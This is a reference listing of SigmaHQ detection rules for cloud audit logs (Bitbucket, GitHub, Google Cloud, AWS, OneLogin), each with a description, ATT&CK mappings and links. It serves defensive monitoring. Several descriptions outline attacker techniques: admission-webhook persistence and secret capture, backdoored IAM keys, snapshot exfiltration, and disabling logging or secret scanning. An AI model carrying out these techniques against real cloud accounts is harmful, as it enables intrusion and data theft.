The tag is: misp-galaxy:sigma-rules="Bitbucket Unauthorized Full Data Export Triggered"

Bitbucket Unauthorized Full Data Export Triggered has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Accounts - T1586" with estimative-language:likelihood-probability="almost-certain"

Table 11189. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml

Bitbucket Global Secret Scanning Rule Deleted

Detects Bitbucket global secret scanning rule deletion activity.

The tag is: misp-galaxy:sigma-rules="Bitbucket Global Secret Scanning Rule Deleted"

Bitbucket Global Secret Scanning Rule Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11190. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml

Bitbucket User Details Export Attempt Detected

Detects user data export activity.

The tag is: misp-galaxy:sigma-rules="Bitbucket User Details Export Attempt Detected"

Bitbucket User Details Export Attempt Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Identify Roles - T1591.004" with estimative-language:likelihood-probability="almost-certain"

Table 11191. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml

Bitbucket User Login Failure

Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.

The tag is: misp-galaxy:sigma-rules="Bitbucket User Login Failure"

Bitbucket User Login Failure has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11192. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml

New Github Organization Member Added

Detects when a new member is added or invited to a github organization.

The tag is: misp-galaxy:sigma-rules="New Github Organization Member Added"

New Github Organization Member Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"

Table 11193. Table References

Links

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_new_org_member.yml

Github New Secret Created

Detects when a user creates action secret for the organization, environment, codespaces or repository.

The tag is: misp-galaxy:sigma-rules="Github New Secret Created"

Github New Secret Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11194. Table References

Links

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_new_secret_created.yml

Github Delete Action Invoked

Detects delete action in the Github audit logs for codespaces, environment, project and repo.

The tag is: misp-galaxy:sigma-rules="Github Delete Action Invoked"

Github Delete Action Invoked has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"

Table 11195. Table References

Links

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_delete_action_invoked.yml

Github Outside Collaborator Detected

Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.

The tag is: misp-galaxy:sigma-rules="Github Outside Collaborator Detected"

Github Outside Collaborator Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"

Table 11196. Table References

Links

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_outside_collaborator_detected.yml

Github Self Hosted Runner Changes Detected

A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.

The tag is: misp-galaxy:sigma-rules="Github Self Hosted Runner Changes Detected"

Github Self Hosted Runner Changes Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Service Discovery - T1526" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11198. Table References

Links

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation

https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_self_hosted_runner_changes_detected.yml

Outdated Dependency Or Vulnerability Alert Disabled

Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.

The tag is: misp-galaxy:sigma-rules="Outdated Dependency Or Vulnerability Alert Disabled"

Outdated Dependency Or Vulnerability Alert Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001" with estimative-language:likelihood-probability="almost-certain"

Table 11199. Table References

Links

https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disabled_outdated_dependency_or_vulnerability.yml

Google Cloud DNS Zone Modified or Deleted

Identifies when a DNS Zone is modified or deleted in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud DNS Zone Modified or Deleted"

Table 11200. Table References

Links

https://cloud.google.com/dns/docs/reference/v1/managedZones

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_dns_zone_modified_or_deleted.yml

Google Cloud Kubernetes Secrets Modified or Deleted

Identifies when the Secrets are Modified or Deleted.

The tag is: misp-galaxy:sigma-rules="Google Cloud Kubernetes Secrets Modified or Deleted"

Table 11201. Table References

Links

https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_secrets_modified_or_deleted.yml

Google Cloud SQL Database Modified or Deleted

Detect when a Cloud SQL DB has been modified or deleted.

The tag is: misp-galaxy:sigma-rules="Google Cloud SQL Database Modified or Deleted"

Table 11202. Table References

Links

https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_sql_database_modified_or_deleted.yml

Google Cloud Service Account Modified

Identifies when a service account is modified in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Service Account Modified"

Table 11203. Table References

Links

https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_service_account_modified.yml

Google Cloud Storage Buckets Enumeration

Detects when storage bucket is enumerated in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Storage Buckets Enumeration"

Table 11205. Table References

Links

https://cloud.google.com/storage/docs/json_api/v1/buckets

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_bucket_enumeration.yml

GCP Break-glass Container Workload Deployed

Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.

The tag is: misp-galaxy:sigma-rules="GCP Break-glass Container Workload Deployed"

GCP Break-glass Container Workload Deployed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 11206. Table References

Links

https://cloud.google.com/binary-authorization

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_breakglass_container_workload_deployed.yml

Google Cloud Kubernetes CronJob

Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

The tag is: misp-galaxy:sigma-rules="Google Cloud Kubernetes CronJob"

Table 11207. Table References

Links

https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/

https://kubernetes.io/docs/concepts/workloads/controllers/job/

https://cloud.google.com/kubernetes-engine/docs

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_cronjob.yml

Google Cloud VPN Tunnel Modified or Deleted

Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud VPN Tunnel Modified or Deleted"

Table 11208. Table References

Links

https://any-api.com/googleapis_com/compute/docs/vpnTunnels

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_vpn_tunnel_modified_or_deleted.yml

Google Cloud Firewall Modified or Deleted

Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).

The tag is: misp-galaxy:sigma-rules="Google Cloud Firewall Modified or Deleted"

Google Cloud Firewall Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 11209. Table References

Links

https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html

https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml

Google Cloud Re-identifies Sensitive Information

Identifies when sensitive information is re-identified in google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Re-identifies Sensitive Information"

Google Cloud Re-identifies Sensitive Information has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"

Table 11210. Table References

Links

https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_dlp_re_identifies_sensitive_information.yml

Google Cloud Kubernetes Admission Controller

Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.

The tag is: misp-galaxy:sigma-rules="Google Cloud Kubernetes Admission Controller"

Google Cloud Kubernetes Admission Controller has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Container API - T1552.007" with estimative-language:likelihood-probability="almost-certain"

Table 11211. Table References

Links

https://cloud.google.com/kubernetes-engine/docs

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_admission_controller.yml

Google Cloud Service Account Disabled or Deleted

Identifies when a service account is disabled or deleted in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Service Account Disabled or Deleted"

Google Cloud Service Account Disabled or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 11212. Table References

Links

https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_service_account_disabled_or_deleted.yml

Google Cloud Storage Buckets Modified or Deleted

Detects when storage bucket is modified or deleted in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Storage Buckets Modified or Deleted"

Table 11213. Table References

Links

https://cloud.google.com/storage/docs/json_api/v1/buckets

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_bucket_modified_or_deleted.yml

Google Full Network Traffic Packet Capture

Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.

The tag is: misp-galaxy:sigma-rules="Google Full Network Traffic Packet Capture"

Google Full Network Traffic Packet Capture has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 11214. Table References

Links

https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging

https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_full_network_traffic_packet_capture.yml

GCP Access Policy Deleted

Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.

The tag is: misp-galaxy:sigma-rules="GCP Access Policy Deleted"

GCP Access Policy Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11215. Table References

Links

https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog

https://cloud.google.com/logging/docs/audit/understanding-audit-logs

https://cloud.google.com/access-context-manager/docs/audit-logging

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_access_policy_deleted.yml

Google Workspace Application Access Level Modified

Detects when an access level is changed for a Google workspace application. An access level is part of BeyondCorp Enterprise which is Google Workspace’s way of enforcing Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google workspace resources.

The tag is: misp-galaxy:sigma-rules="Google Workspace Application Access Level Modified"

Google Workspace Application Access Level Modified has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

Table 11218. Table References

Links

https://support.google.com/a/answer/9261439

https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_application_access_levels_modified.yml

Google Workspace Granted Domain API Access

Detects when an API access service account is granted domain authority.

The tag is: misp-galaxy:sigma-rules="Google Workspace Granted Domain API Access"

Google Workspace Granted Domain API Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11220. Table References

Links

https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3

https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_granted_domain_api_access.yml

Google Workspace User Granted Admin Privileges

Detects when an Google Workspace user is granted admin privileges.

The tag is: misp-galaxy:sigma-rules="Google Workspace User Granted Admin Privileges"

Google Workspace User Granted Admin Privileges has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11221. Table References

Links

https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3

https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml

OneLogin User Assumed Another User

Detects when an user assumed another user account.

The tag is: misp-galaxy:sigma-rules="OneLogin User Assumed Another User"

Table 11223. Table References

Links

https://developers.onelogin.com/api-docs/1/events/event-resource

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml

OneLogin User Account Locked

Detects when an user account is locked or suspended.

The tag is: misp-galaxy:sigma-rules="OneLogin User Account Locked"

Table 11224. Table References

Links

https://developers.onelogin.com/api-docs/1/events/event-resource/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml

AWS EC2 Disable EBS Encryption

Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.

The tag is: misp-galaxy:sigma-rules="AWS EC2 Disable EBS Encryption"

AWS EC2 Disable EBS Encryption has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"

Table 11226. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_disable_encryption.yml

AWS IAM Backdoor Users Keys

Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org.

The tag is: misp-galaxy:sigma-rules="AWS IAM Backdoor Users Keys"

AWS IAM Backdoor Users Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11227. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iambackdoor_users_keys/main.py

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_backdoor_users_keys.yml

AWS SecurityHub Findings Evasion

Detects the modification of the findings on SecurityHub.

The tag is: misp-galaxy:sigma-rules="AWS SecurityHub Findings Evasion"

AWS SecurityHub Findings Evasion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 11228. Table References

Links

https://docs.aws.amazon.com/cli/latest/reference/securityhub/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_securityhub_finding_evasion.yml

SES Identity Has Been Deleted

Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities

The tag is: misp-galaxy:sigma-rules="SES Identity Has Been Deleted"

SES Identity Has Been Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 11229. Table References

Links

https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_delete_identity.yml

AWS Snapshot Backup Exfiltration

Detects the modification of an EC2 snapshot’s permissions to enable access from another account

The tag is: misp-galaxy:sigma-rules="AWS Snapshot Backup Exfiltration"

AWS Snapshot Backup Exfiltration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"

Table 11230. Table References

Links

https://www.justice.gov/file/1080281/download

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_snapshot_backup_exfiltration.yml

AWS EFS Fileshare Mount Modified or Deleted

Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.

The tag is: misp-galaxy:sigma-rules="AWS EFS Fileshare Mount Modified or Deleted"

AWS EFS Fileshare Mount Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11231. Table References

Links

https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml

AWS Route 53 Domain Transferred to Another Account

Detects when a request has been made to transfer a Route 53 domain to another AWS account.

The tag is: misp-galaxy:sigma-rules="AWS Route 53 Domain Transferred to Another Account"

AWS Route 53 Domain Transferred to Another Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11232. Table References

Links

https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml

AWS STS AssumeRole Misuse

Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.

The tag is: misp-galaxy:sigma-rules="AWS STS AssumeRole Misuse"

AWS STS AssumeRole Misuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

Table 11233. Table References

Links

https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html

https://github.com/elastic/detection-rules/pull/1214

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sts_assumerole_misuse.yml

AWS RDS Master Password Change

Detects the change of database master password. It may be a part of data exfiltration.

The tag is: misp-galaxy:sigma-rules="AWS RDS Master Password Change"

AWS RDS Master Password Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 11234. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rdsexplore_snapshots/main.py

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_rds_change_master_password.yml

AWS ElastiCache Security Group Modified or Deleted

Identifies when an ElastiCache security group has been modified or deleted.

The tag is: misp-galaxy:sigma-rules="AWS ElastiCache Security Group Modified or Deleted"

AWS ElastiCache Security Group Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 11235. Table References

Links

https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml

AWS Suspicious SAML Activity

Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.

The tag is: misp-galaxy:sigma-rules="AWS Suspicious SAML Activity"

AWS Suspicious SAML Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

Table 11236. Table References

Links

https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html

https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_susp_saml_activity.yml

AWS EKS Cluster Created or Deleted

Identifies when an EKS cluster is created or deleted.

The tag is: misp-galaxy:sigma-rules="AWS EKS Cluster Created or Deleted"

AWS EKS Cluster Created or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11237. Table References

Links

https://any-api.com/amazonaws_com/eks/docs/API_Description

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_eks_cluster_created_or_deleted.yml

Restore Public AWS RDS Instance

Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.

The tag is: misp-galaxy:sigma-rules="Restore Public AWS RDS Instance"

Restore Public AWS RDS Instance has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 11238. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rdsexplore_snapshots/main.py

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_rds_public_db_restore.yml

AWS IAM S3Browser Templated S3 Bucket Policy Creation

Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "<YOUR-BUCKET-NAME>".

The tag is: misp-galaxy:sigma-rules="AWS IAM S3Browser Templated S3 Bucket Policy Creation"

AWS IAM S3Browser Templated S3 Bucket Policy Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud API - T1059.009" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11239. Table References

Links

https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml

AWS CloudTrail Important Change

Detects disabling, deleting and updating of a Trail

The tag is: misp-galaxy:sigma-rules="AWS CloudTrail Important Change"

AWS CloudTrail Important Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11240. Table References

Links

https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_disable_logging.yml

AWS EC2 Startup Shell Script Change

Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.

The tag is: misp-galaxy:sigma-rules="AWS EC2 Startup Shell Script Change"

AWS EC2 Startup Shell Script Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11241. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2startup_shell_script/main.py#L9

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_startup_script_change.yml

Potential Bucket Enumeration on AWS

Looks for potential enumeration of AWS buckets via ListBuckets.

The tag is: misp-galaxy:sigma-rules="Potential Bucket Enumeration on AWS"

Potential Bucket Enumeration on AWS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Infrastructure Discovery - T1580" with estimative-language:likelihood-probability="almost-certain"

Table 11242. Table References

Links

https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html

